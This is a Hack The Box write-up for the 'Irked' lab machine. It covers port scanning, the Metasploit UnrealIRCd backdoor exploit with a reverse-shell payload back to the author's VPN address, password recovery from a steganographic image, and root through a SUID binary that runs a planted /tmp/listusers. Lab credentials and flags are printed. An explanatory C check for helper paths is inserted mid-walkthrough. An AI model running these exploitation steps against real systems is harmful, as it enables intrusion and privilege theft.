# Irked \[EASY🟢]

<figure><img src="/files/UiTEvPUqjDel1xPvTnsR" alt="" width="563"><figcaption><p><a href="https://app.hackthebox.com/machines/163"><code>Irked</code></a></p></figcaption></figure>

## 1- Reconnaissance and scanning

### `1.1 Ping`

```bash
PING 10.10.10.117 (10.10.10.117) 56(84) bytes of data.
64 bytes from 10.10.10.117: icmp_seq=1 ttl=63 time=171 ms

--- 10.10.10.117 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 170.883/170.883/170.883/0.000 ms
```

We can tell that this is a Linux machine from the TTL (63 in the reply):

```
TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)
```

### `1.2 Nmap`

<pre class="language-bash"><code class="lang-bash">┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.117 -oN escaneo.txt
<strong># Nmap 7.95 scan initiated Tue Feb 25 18:42:06 2025 as: /usr/lib/nmap/nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv -oN escaneo.txt 10.10.10.117
</strong>Nmap scan report for 10.10.10.117
Host is up, received user-set (0.18s latency).
Scanned at 2025-02-25 18:42:07 -03 for 35s
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8=
|   256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj
80/tcp    open  http    syn-ack ttl 63 Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34788/udp   status
|   100024  1          44738/tcp   status
|   100024  1          56998/udp6  status
|_  100024  1          58644/tcp6  status
6697/tcp  open  irc     syn-ack ttl 63 UnrealIRCd
8067/tcp  open  irc     syn-ack ttl 63 UnrealIRCd
44738/tcp open  status  syn-ack ttl 63 1 (RPC #100024)
65534/tcp open  irc     syn-ack ttl 63 UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 25 18:42:42 2025 -- 1 IP address (1 host up) scanned in 35.83 seconds

</code></pre>

We see port 22 (OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)), which is an SSH server; port 80 (Apache httpd 2.4.10 ((Debian))), which is a web server; and an IRC server (UnrealIRCd) on ports "6697, 8067 and 65534".

We can also see that the Linux distribution running on the target machine is Debian.

### `1.3 whatweb`

To scan the web technologies, we first edit the hosts file at "/etc/hosts" so that the domain "irked.htb" points to the machine:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# vim /etc/hosts
```

After editing, it looks like this:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       t0mz


# HACK THE BOX
10.10.11.182    photobomb.htb
10.10.10.117    irked.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

```
IP 10.10.10.117 <--> irked.htb
```

This way, when we open the site in the browser, we get the following page:

<figure><img src="/files/tF0kPhHQOCP2VX8NvqF2" alt=""><figcaption></figcaption></figure>

Now let's scan the web technologies with "whatweb":

```
http://irked.htb/ [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[10.10.10.117]
```

We see technologies such as:

```
Apache 2.4.10
OS: Debian Linux
```

### `1.4 Fuzzing`

Here we do the fuzzing with the "wfuzz" tool, using the following command:

```bash
wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://irked.htb/FUZZ
```

We run it:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://irked.htb/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://irked.htb/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                     
=====================================================================

000000003:   200        3 L      7 W        72 Ch       "# Copyright 2007 James Fisher"             
000000014:   200        3 L      7 W        72 Ch       "http://irked.htb/"                         
000000011:   200        3 L      7 W        72 Ch       "# Priority ordered case sensative list, whe
                                                        re entries were found"                      
000000001:   200        3 L      7 W        72 Ch       "# directory-list-2.3-medium.txt"           
000000730:   301        9 L      28 W       307 Ch      "manual"                                    
000000004:   200        3 L      7 W        72 Ch       "#"                                         
000000002:   200        3 L      7 W        72 Ch       "#"                                         
000000005:   200        3 L      7 W        72 Ch       "# This work is licensed under the Creative 
                                                        Commons"                                    
000000008:   200        3 L      7 W        72 Ch       "# or send a letter to Creative Commons, 171
                                                         Second Street,"                            
000000006:   200        3 L      7 W        72 Ch       "# Attribution-Share Alike 3.0 License. To v
                                                        iew a copy of this"                         
000000009:   200        3 L      7 W        72 Ch       "# Suite 300, San Francisco, California, 941
                                                        05, USA."                                   
000000012:   200        3 L      7 W        72 Ch       "# on atleast 2 different hosts"            
000000010:   200        3 L      7 W        72 Ch       "#"                                         
000000013:   200        3 L      7 W        72 Ch       "#"                                         
000000007:   200        3 L      7 W        72 Ch       "# license, visit http://creativecommons.org
                                                        /licenses/by-sa/3.0/"                       
000045240:   200        3 L      7 W        72 Ch       "http://irked.htb/"                         
000095524:   403        11 L     32 W       297 Ch      "server-status"                             

Total time: 283.5176
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 777.9410
```

The fuzzing does not turn up anything relevant.

## 2- Exploitation

### `2.1 UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit Framework)`

Let's open Metasploit Framework:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# msfconsole -q         
msf6 > 
```

And search for exploits for the "UnrealIRCd" service:

```bash
msf6 > search UnrealIRCd

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 > 
```

Here we will use the exploit "exploit/unix/irc/unreal\_ircd\_3281\_backdoor", which uses the backdoor in UnrealIRCd 3.2.8.1 to execute commands:

```bash
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 
```

Now we set the parameters the exploit needs:

```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.10.10.117
RHOSTS => 10.10.10.117
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options 

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.117     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                       g-metasploit.html
   RPORT    6697             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 
```

(By default the exploit uses port 6667; on this machine the IRC server listens on port 6697)

```bash
6697/tcp  open  irc     syn-ack ttl 63 UnrealIRCd
```

Now we choose a payload; in my case I will use "payload/cmd/unix/reverse" to get a reverse shell:

```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 
```

And now we set the payload's parameters so that it works correctly:

```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options 

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.117     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                       g-metasploit.html
   RPORT    6697             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.12      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 
```

(Remember to use the IP of the VPN that Hack The Box assigns us on the "tun0" network interface)

Now we run the exploit:

```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.10.14.12:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo augpopTkghLaeDKT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "augpopTkghLaeDKT\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.12:4444 -> 10.10.10.117:45615) at 2025-02-25 19:55:12 -0300

whoami
ircd
```

We now have access to the machine as a user; what remains is to get a prompt with the "shell" command:

```bash
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
whoami
whoami
ircd
ircd@irked:~/Unreal3.2$ 
```

(After running "shell", run a command, as with the "whoami" above)

### `2.2 User djmardov`

To get the user and root flags we need to escalate privileges. The "user.txt" file is at "/home/djmardov/user.txt", but we cannot read it because we lack the permissions:

```bash
ircd@irked:/home/djmardov$ cat /home/djmardov/user.txt
cat /home/djmardov/user.txt
cat: /home/djmardov/user.txt: Permission denied
ircd@irked:/home/djmardov$ 
```

Now let's move to the "Documents" directory of the user "djmardov":

```
ircd@irked:/home/djmardov$ cd /home/djmardov/Documents
cd /home/djmardov/Documents
ircd@irked:/home/djmardov/Documents$ 
```

And list its contents, including hidden files:

```bash
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 12
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
lrwxrwxrwx  1 root     root       23 Sep  5  2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov/Documents$ 
```

We see a file named ".backup"; let's display it with cat:

```bash
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
ircd@irked:/home/djmardov/Documents$ 
```

We see a possible password:

```
UPupDOWNdownLRlrBAbaSSss
```

### `2.3 Steganography with the obtained password`

Now let's go to the machine's web page, where there is an image; we download it with wget, `wget http://irked.htb/irked.jpg`:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# wget http://irked.htb/irked.jpg
--2025-02-25 20:04:03--  http://irked.htb/irked.jpg
Resolviendo irked.htb (irked.htb)... 10.10.10.117
Conectando con irked.htb (irked.htb)[10.10.10.117]:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 34697 (34K) [image/jpeg]
Grabando a: «irked.jpg.1»

irked.jpg.1                     100%[=====================================================>]  33,88K   195KB/s    en 0,2s    

2025-02-25 20:04:04 (195 KB/s) - «irked.jpg.1» guardado [34697/34697]

                                                                                                                              
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# 
```

Now we use the "steghide" tool to extract the files and information hidden inside the "irked.jpg" image, with the following command:

```bash
steghide extract -sf irked.jpg
```

This tool is not installed on Kali; to install it we use the apt package manager: `sudo apt install steghide`

We run the `steghide` command:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# steghide extract -sf irked.jpg
Anotar salvoconducto: 
```

It asks for a passphrase (the `Anotar salvoconducto:` prompt), which is the password we obtained earlier from the ".backup" file, "UPupDOWNdownLRlrBAbaSSss". We enter it and list what was extracted from the image:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# steghide extract -sf irked.jpg
Anotar salvoconducto: 
anotó los datos extraídos e/"pass.txt".
                                                                                                                              
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# ls
escaneo.txt  irked.jpg  irked.jpg.1  pass.txt  ping.txt  whatweb.txt
                                                                                                                              
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# 
```

It extracted a text file named "pass.txt"; let's display it:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# cat pass.txt   
Kab6h+m+bbp2J:HG
                                                                                                                              
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# 
```

It gives us a password; now we log in over SSH as the user "djmardov" with the password obtained from the image:

```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# ssh djmardov@10.10.10.117     
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ED25519) to the list of known hosts.
djmardov@10.10.10.117's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ 
```

### `2.4 Obtaining the user flag`

And now we can get the user flag, which is in the home directory of the user "djmardov":

```bash
djmardov@irked:~$ cat /home/djmardov/user.txt
97e5e938e3758bcb39bc1939ed2ec2aa
djmardov@irked:~$ 
```

## 3- Privilege escalation

### `3.1 Files with SUID permissions`

To elevate privileges, we look for files with the SUID bit set, that is, files that we can run as the user "djmardov" but that execute as if we were root. For that we use the `find` command as follows:

```bash
find / -perm -u=s -type f 2>/dev/null
```

(`2>/dev/null` redirects all errors to `/dev/null`)

We run it:

```bash
djmardov@irked:~$ find / -perm -u=s  -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
```

We can see an unusual file named `/usr/bin/viewuser`; let's look at the permissions of this executable:

```bash
djmardov@irked:~$ ls -la /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
djmardov@irked:~$ 
```

The owner (root) has read, write and execute permissions with the SUID bit set (`rws`), and every other user can read and execute it.

Let's run the "viewuser" binary:

```bash
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2025-02-25 16:40 (:0)
djmardov pts/1        2025-02-25 18:09 (10.10.14.12)
sh: 1: /tmp/listusers: not found
djmardov@irked:~$ 
```

We see that the program is missing the file "listusers" in the "/tmp" directory, which it tries to run. We will create it and give it full permissions (777); in my case the command I will put in the "listusers" file is:

```bash
su -
```

Now we create the "listusers" file with the "echo" command and list the directory to check it:

```bash
djmardov@irked:/tmp$ echo 'su -' > listusers
djmardov@irked:/tmp$ ls
listusers
systemd-private-1b3b7135d63a4419ac45a44ce27b1474-colord.service-1fYr0K
systemd-private-1b3b7135d63a4419ac45a44ce27b1474-cups.service-0dxbOE
systemd-private-1b3b7135d63a4419ac45a44ce27b1474-rtkit-daemon.service-3KNNpa
vmware-root
djmardov@irked:/tmp$ 
```

And we give it full permissions with the "chmod" command:

```bash
djmardov@irked:/tmp$ chmod 777 listusers 
djmardov@irked:/tmp$ 
```

And now we run the "viewuser" binary that we found with SUID permissions:

```bash
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2025-02-25 16:40 (:0)
djmardov pts/1        2025-02-25 18:09 (10.10.14.12)
root@irked:~# 
```

We are now root.

### `3.2 Obtaining the root flag`

The root flag is at `/root/root.txt`; let's display it:
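The escalation above works because a setuid-root program runs a helper that lives in a world-writable directory (the `sh: 1: /tmp/listusers: not found` line). The following is an added example, not code from the machine or from this write-up (the source of `viewuser` is not shown on the page, and `check_helper`, `demo_check` and the status names are hypothetical): a check a privileged program can apply before executing a helper, which rejects the helper when the file or any directory above it can be modified by an untrusted user.

```c
/* Added example; names are hypothetical, viewuser's source is not on the page. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum helper_status { HELPER_OK, HELPER_BAD_PATH, HELPER_MISSING,
                     HELPER_FILE_UNTRUSTED, HELPER_DIR_UNTRUSTED };

/* Only root or `trusted` may own the object, and nobody else may write it. */
static int locked_down(const struct stat *st, uid_t trusted) {
    return (st->st_uid == 0 || st->st_uid == trusted) &&
           !(st->st_mode & (S_IWGRP | S_IWOTH));
}

/* Decide whether `path` may be executed with elevated privileges. */
enum helper_status check_helper(const char *path, uid_t trusted) {
    char buf[PATH_MAX];
    struct stat st;
    if (path[0] != '/' || strlen(path) >= sizeof buf) return HELPER_BAD_PATH;
    if (lstat(path, &st) != 0) return HELPER_MISSING;
    /* lstat: a symlink is rejected rather than followed. */
    if (!S_ISREG(st.st_mode) || !locked_down(&st, trusted))
        return HELPER_FILE_UNTRUSTED;

    /* Walk every ancestor up to "/": a writable directory anywhere on the
     * way lets another user plant the helper, as with /tmp/listusers. */
    strcpy(buf, path);
    do {
        char *slash = strrchr(buf, '/');
        if (slash == buf) slash[1] = '\0'; else *slash = '\0';
        if (stat(buf, &st) != 0 || !S_ISDIR(st.st_mode) ||
            !locked_down(&st, trusted))
            return HELPER_DIR_UNTRUSTED;
    } while (strcmp(buf, "/") != 0);
    return HELPER_OK;
}

/* Constructed fixture: a private directory holding one helper file, with the
 * modes under test, checked with the current user as the trusted owner. */
enum helper_status demo_check(mode_t file_mode, mode_t dir_mode) {
    char dir[] = "/tmp/helper-demo-XXXXXX", file[64];
    enum helper_status rc;
    int fd;
    if (mkdtemp(dir) == NULL) return HELPER_MISSING;
    snprintf(file, sizeof file, "%s/listusers", dir);
    fd = open(file, O_CREAT | O_WRONLY, 0700);
    if (fd >= 0) close(fd);
    chmod(file, file_mode);
    chmod(dir, dir_mode);
    rc = check_helper(file, getuid());
    unlink(file);
    rmdir(dir);
    return rc;
}

int main(void) {
    printf("mode 777 helper       -> %d\n", demo_check(0777, 0755));
    printf("world-writable parent -> %d\n", demo_check(0755, 0777));
    printf("/tmp/listusers        -> %d\n", check_helper("/tmp/listusers", 0));
    return 0;
}
```

Because every ancestor directory must be unwritable to other users, an unprivileged user cannot swap the file between the check and the execution. A privileged program that needs no helper at all should simply not call one, or should drop its privileges before doing so.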

```bash
root@irked:~# cat /root/root.txt 
b33261ed43e69aa9dd930fb8a853d423
root@irked:~# 
```

With this, we finish the "Irked" machine from Hack The Box.

I hope this write-up was helpful :)

If you had any difficulty solving it, don't forget to contact me on my [social networks](/writeup-ctf/mis-redes-sociales.md)

{% embed url="<https://www.hackthebox.com/achievement/machine/2243466/163>" %}


